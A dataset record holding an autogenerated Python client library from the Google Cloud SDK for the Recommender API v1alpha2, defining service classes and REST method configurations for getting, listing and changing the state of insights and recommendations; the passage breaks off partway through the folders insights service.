hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0d657714f1da72b892970452db4e789cb53b2101
| 91,204
|
py
|
Python
|
lib/googlecloudsdk/third_party/apis/recommender/v1alpha2/recommender_v1alpha2_client.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 2
|
2019-11-10T09:17:07.000Z
|
2019-12-18T13:44:08.000Z
|
lib/googlecloudsdk/third_party/apis/recommender/v1alpha2/recommender_v1alpha2_client.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | null | null | null |
lib/googlecloudsdk/third_party/apis/recommender/v1alpha2/recommender_v1alpha2_client.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 1
|
2020-07-25T01:40:19.000Z
|
2020-07-25T01:40:19.000Z
|
"""Generated client library for recommender version v1alpha2."""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.recommender.v1alpha2 import recommender_v1alpha2_messages as messages
class RecommenderV1alpha2(base_api.BaseApiClient):
"""Generated client library for service recommender version v1alpha2."""
MESSAGES_MODULE = messages
BASE_URL = 'https://recommender.googleapis.com/'
MTLS_BASE_URL = 'https://recommender.mtls.googleapis.com/'
_PACKAGE = 'recommender'
_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']
_VERSION = 'v1alpha2'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'google-cloud-sdk'
_CLIENT_CLASS_NAME = 'RecommenderV1alpha2'
_URL_VERSION = 'v1alpha2'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new recommender handle."""
url = url or self.BASE_URL
super(RecommenderV1alpha2, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.billingAccounts_locations_insightTypes_insights = self.BillingAccountsLocationsInsightTypesInsightsService(self)
self.billingAccounts_locations_insightTypes = self.BillingAccountsLocationsInsightTypesService(self)
self.billingAccounts_locations_recommenders_recommendations = self.BillingAccountsLocationsRecommendersRecommendationsService(self)
self.billingAccounts_locations_recommenders = self.BillingAccountsLocationsRecommendersService(self)
self.billingAccounts_locations = self.BillingAccountsLocationsService(self)
self.billingAccounts = self.BillingAccountsService(self)
self.folders_locations_insightTypes_insights = self.FoldersLocationsInsightTypesInsightsService(self)
self.folders_locations_insightTypes = self.FoldersLocationsInsightTypesService(self)
self.folders_locations_recommenders_recommendations = self.FoldersLocationsRecommendersRecommendationsService(self)
self.folders_locations_recommenders = self.FoldersLocationsRecommendersService(self)
self.folders_locations = self.FoldersLocationsService(self)
self.folders = self.FoldersService(self)
self.organizations_locations_insightTypes_insights = self.OrganizationsLocationsInsightTypesInsightsService(self)
self.organizations_locations_insightTypes = self.OrganizationsLocationsInsightTypesService(self)
self.organizations_locations_recommenders_recommendations = self.OrganizationsLocationsRecommendersRecommendationsService(self)
self.organizations_locations_recommenders = self.OrganizationsLocationsRecommendersService(self)
self.organizations_locations = self.OrganizationsLocationsService(self)
self.organizations = self.OrganizationsService(self)
self.projects_locations_insightTypes_insights = self.ProjectsLocationsInsightTypesInsightsService(self)
self.projects_locations_insightTypes = self.ProjectsLocationsInsightTypesService(self)
self.projects_locations_recommenders_config = self.ProjectsLocationsRecommendersConfigService(self)
self.projects_locations_recommenders_recommendations = self.ProjectsLocationsRecommendersRecommendationsService(self)
self.projects_locations_recommenders = self.ProjectsLocationsRecommendersService(self)
self.projects_locations = self.ProjectsLocationsService(self)
self.projects = self.ProjectsService(self)
class BillingAccountsLocationsInsightTypesInsightsService(base_api.BaseApiService):
"""Service class for the billingAccounts_locations_insightTypes_insights resource."""
_NAME = 'billingAccounts_locations_insightTypes_insights'
def __init__(self, client):
super(RecommenderV1alpha2.BillingAccountsLocationsInsightTypesInsightsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested insight. Requires the recommender.*.get IAM permission for the specified insight type.
Args:
request: (RecommenderBillingAccountsLocationsInsightTypesInsightsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}',
http_method='GET',
method_id='recommender.billingAccounts.locations.insightTypes.insights.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderBillingAccountsLocationsInsightTypesInsightsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists insights for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified insight type.
Args:
request: (RecommenderBillingAccountsLocationsInsightTypesInsightsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListInsightsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights',
http_method='GET',
method_id='recommender.billingAccounts.locations.insightTypes.insights.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/insights',
request_field='',
request_type_name='RecommenderBillingAccountsLocationsInsightTypesInsightsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListInsightsResponse',
supports_download=False,
)
def MarkAccepted(self, request, global_params=None):
r"""Marks the Insight State as Accepted. Users can use this method to indicate to the Recommender API that they have applied some action based on the insight. This stops the insight content from being updated. MarkInsightAccepted can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight.
Args:
request: (RecommenderBillingAccountsLocationsInsightTypesInsightsMarkAcceptedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkAccepted')
return self._RunMethod(
config, request, global_params=global_params)
MarkAccepted.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markAccepted',
http_method='POST',
method_id='recommender.billingAccounts.locations.insightTypes.insights.markAccepted',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markAccepted',
request_field='googleCloudRecommenderV1alpha2MarkInsightAcceptedRequest',
request_type_name='RecommenderBillingAccountsLocationsInsightTypesInsightsMarkAcceptedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Insight State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED insight has to be marked back as ACTIVE. MarkInsightActive can be applied to insights in DISMISSED state. Requires the recommender.*.update IAM permission for the specified insight type.
Args:
request: (RecommenderBillingAccountsLocationsInsightTypesInsightsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markActive',
http_method='POST',
method_id='recommender.billingAccounts.locations.insightTypes.insights.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkInsightActiveRequest',
request_type_name='RecommenderBillingAccountsLocationsInsightTypesInsightsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Insight State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE insight should be dismissed. MarkInsightDismissed can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight type.
Args:
request: (RecommenderBillingAccountsLocationsInsightTypesInsightsMarkDismissedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markDismissed',
http_method='POST',
method_id='recommender.billingAccounts.locations.insightTypes.insights.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkInsightDismissedRequest',
request_type_name='RecommenderBillingAccountsLocationsInsightTypesInsightsMarkDismissedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
class BillingAccountsLocationsInsightTypesService(base_api.BaseApiService):
"""Service class for the billingAccounts_locations_insightTypes resource."""
_NAME = 'billingAccounts_locations_insightTypes'
def __init__(self, client):
super(RecommenderV1alpha2.BillingAccountsLocationsInsightTypesService, self).__init__(client)
self._upload_configs = {
}
class BillingAccountsLocationsRecommendersRecommendationsService(base_api.BaseApiService):
"""Service class for the billingAccounts_locations_recommenders_recommendations resource."""
_NAME = 'billingAccounts_locations_recommenders_recommendations'
def __init__(self, client):
super(RecommenderV1alpha2.BillingAccountsLocationsRecommendersRecommendationsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested recommendation. Requires the recommender.*.get IAM permission for the specified recommender.
Args:
request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}',
http_method='GET',
method_id='recommender.billingAccounts.locations.recommenders.recommendations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists recommendations for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified recommender.
Args:
request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListRecommendationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations',
http_method='GET',
method_id='recommender.billingAccounts.locations.recommenders.recommendations.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/recommendations',
request_field='',
request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListRecommendationsResponse',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Recommendation State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED recommendation has to be marked back as ACTIVE. MarkRecommendationActive can be applied to recommendations in DISMISSED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markActive',
http_method='POST',
method_id='recommender.billingAccounts.locations.recommenders.recommendations.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationActiveRequest',
request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkClaimed(self, request, global_params=None):
r"""Marks the Recommendation State as Claimed. Users can use this method to indicate to the Recommender API that they are starting to apply the recommendation themselves. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationClaimed can be applied to recommendations in CLAIMED or ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkClaimedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkClaimed')
return self._RunMethod(
config, request, global_params=global_params)
MarkClaimed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markClaimed',
http_method='POST',
method_id='recommender.billingAccounts.locations.recommenders.recommendations.markClaimed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markClaimed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationClaimedRequest',
request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkClaimedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Recommendation State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE recommendation has to be marked back as DISMISSED. MarkRecommendationDismissed can be applied to recommendations in ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkDismissedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markDismissed',
http_method='POST',
method_id='recommender.billingAccounts.locations.recommenders.recommendations.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationDismissedRequest',
request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkDismissedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkFailed(self, request, global_params=None):
r"""Marks the Recommendation State as Failed. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation failed. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationFailed can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkFailedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkFailed')
return self._RunMethod(
config, request, global_params=global_params)
MarkFailed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markFailed',
http_method='POST',
method_id='recommender.billingAccounts.locations.recommenders.recommendations.markFailed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markFailed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationFailedRequest',
request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkFailedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkSucceeded(self, request, global_params=None):
r"""Marks the Recommendation State as Succeeded. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation was successful. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationSucceeded can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkSucceededRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkSucceeded')
return self._RunMethod(
config, request, global_params=global_params)
MarkSucceeded.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/billingAccounts/{billingAccountsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markSucceeded',
http_method='POST',
method_id='recommender.billingAccounts.locations.recommenders.recommendations.markSucceeded',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markSucceeded',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationSucceededRequest',
request_type_name='RecommenderBillingAccountsLocationsRecommendersRecommendationsMarkSucceededRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
class BillingAccountsLocationsRecommendersService(base_api.BaseApiService):
"""Service class for the billingAccounts_locations_recommenders resource."""
_NAME = 'billingAccounts_locations_recommenders'
def __init__(self, client):
super(RecommenderV1alpha2.BillingAccountsLocationsRecommendersService, self).__init__(client)
self._upload_configs = {
}
class BillingAccountsLocationsService(base_api.BaseApiService):
"""Service class for the billingAccounts_locations resource."""
_NAME = 'billingAccounts_locations'
def __init__(self, client):
super(RecommenderV1alpha2.BillingAccountsLocationsService, self).__init__(client)
self._upload_configs = {
}
class BillingAccountsService(base_api.BaseApiService):
"""Service class for the billingAccounts resource."""
_NAME = 'billingAccounts'
def __init__(self, client):
super(RecommenderV1alpha2.BillingAccountsService, self).__init__(client)
self._upload_configs = {
}
class FoldersLocationsInsightTypesInsightsService(base_api.BaseApiService):
"""Service class for the folders_locations_insightTypes_insights resource."""
_NAME = 'folders_locations_insightTypes_insights'
def __init__(self, client):
super(RecommenderV1alpha2.FoldersLocationsInsightTypesInsightsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested insight. Requires the recommender.*.get IAM permission for the specified insight type.
Args:
request: (RecommenderFoldersLocationsInsightTypesInsightsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}',
http_method='GET',
method_id='recommender.folders.locations.insightTypes.insights.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderFoldersLocationsInsightTypesInsightsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists insights for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified insight type.
Args:
request: (RecommenderFoldersLocationsInsightTypesInsightsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListInsightsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights',
http_method='GET',
method_id='recommender.folders.locations.insightTypes.insights.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/insights',
request_field='',
request_type_name='RecommenderFoldersLocationsInsightTypesInsightsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListInsightsResponse',
supports_download=False,
)
def MarkAccepted(self, request, global_params=None):
r"""Marks the Insight State as Accepted. Users can use this method to indicate to the Recommender API that they have applied some action based on the insight. This stops the insight content from being updated. MarkInsightAccepted can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight.
Args:
request: (RecommenderFoldersLocationsInsightTypesInsightsMarkAcceptedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkAccepted')
return self._RunMethod(
config, request, global_params=global_params)
MarkAccepted.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markAccepted',
http_method='POST',
method_id='recommender.folders.locations.insightTypes.insights.markAccepted',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markAccepted',
request_field='googleCloudRecommenderV1alpha2MarkInsightAcceptedRequest',
request_type_name='RecommenderFoldersLocationsInsightTypesInsightsMarkAcceptedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Insight State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED insight has to be marked back as ACTIVE. MarkInsightActive can be applied to insights in DISMISSED state. Requires the recommender.*.update IAM permission for the specified insight type.
Args:
request: (RecommenderFoldersLocationsInsightTypesInsightsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markActive',
http_method='POST',
method_id='recommender.folders.locations.insightTypes.insights.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkInsightActiveRequest',
request_type_name='RecommenderFoldersLocationsInsightTypesInsightsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Insight State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE insight should be dismissed. MarkInsightDismissed can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight type.
Args:
request: (RecommenderFoldersLocationsInsightTypesInsightsMarkDismissedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markDismissed',
http_method='POST',
method_id='recommender.folders.locations.insightTypes.insights.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkInsightDismissedRequest',
request_type_name='RecommenderFoldersLocationsInsightTypesInsightsMarkDismissedRequest',
